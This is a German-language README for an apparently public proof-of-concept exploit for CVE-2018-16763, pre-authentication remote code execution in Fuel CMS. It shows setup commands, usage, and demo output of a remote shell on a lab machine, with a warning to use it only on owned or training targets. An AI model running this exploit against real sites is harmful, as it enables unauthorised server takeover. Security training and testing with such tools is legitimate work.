
Ein Proof-of-Concept (PoC)-Exploit für CVE-2018-16763 (Fuel CMS - Vorauthentifizierte Remote-Code-Ausführung).
Ein Proof-of-Concept (PoC) Exploit für CVE-2018-16763 (Fuel CMS – Preauthenticated Remote Code Execution).
Dieses Python-3-Programm dient als PoC für die Schwachstelle CVE-2018-16763 im Content-Management-System Fuel CMS. Konkret ermöglicht die Schwachstelle die Evaluierung von PHP-Code über den Parameter pages/select/filter (implementiert in diesem PoC), was zu Preauthenticated Remote Code Execution führt, einer kritischen Systemschwachstelle.
git clone https://github.com/saccles/CVE-2018-16763-Proof-of-Concept.git
cd CVE-2018-16763-Proof-of-Concept
python3 -m pip install -r requirements.txt
Führen Sie das Exploit-Script gegen ein verwundbares Ziel aus. (Führen Sie das Script NUR GEGEN EIN ZIEL AUS, DAS IHNEN GEHÖRT ODER DAS VON TryHackMe, HackTheBox ODER EINER ANDEREN ETHISCHEN HACKING-WEBSITE BEREITGESTELLT WURDE!) Ich empfehle, sich die 'Ignite'-Challenge von TryHackMe für weitere Details anzusehen. Sie können die verwundbare Fuel CMS-Anwendung auch von exploit-db.com herunterladen.
python3 CVE-2018-16763.py -u URL
[DEBUG] Connecting to http://10.10.60.46 ...
[DEBUG] Succesfully connected!
Enter Command:
$ ls -la
total 52
drwxrwxrwx 4 root root 4096 Jul 26 2019 .
drwxr-xr-x 3 root root 4096 Jul 26 2019 ..
-rw-r--r-- 1 root root 163 Jul 26 2019 .htaccess
-rwxrwxrwx 1 root root 1427 Jul 26 2019 README.md
drwxrwxrwx 9 root root 4096 Jul 26 2019 assets
-rwxrwxrwx 1 root root 193 Jul 26 2019 composer.json
-rwxrwxrwx 1 root root 6502 Jul 26 2019 contributing.md
drwxrwxrwx 9 root root 4096 Jul 26 2019 fuel
-rwxrwxrwx 1 root root 11802 Jul 26 2019 index.php
-rwxrwxrwx 1 root root 30 Jul 26 2019 robots.txt
python3 CVE-2018-16763.py -h
usage: CVE-2018-16763.py [-h] -u URL
This tool exploits CVE-2018-16763 on Fuel CMS.
options:
-h, --help show this help message and exit
-u URL, --url URL Fuel CMS url.
Silas Accles [saccles]
Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die Datei LICENSE.md für Details.
Stark inspiriert von Exploit-DB-Programmen, Vozecs PoC-Skripten und dem ursprünglichen PoC von Padsala Trushal.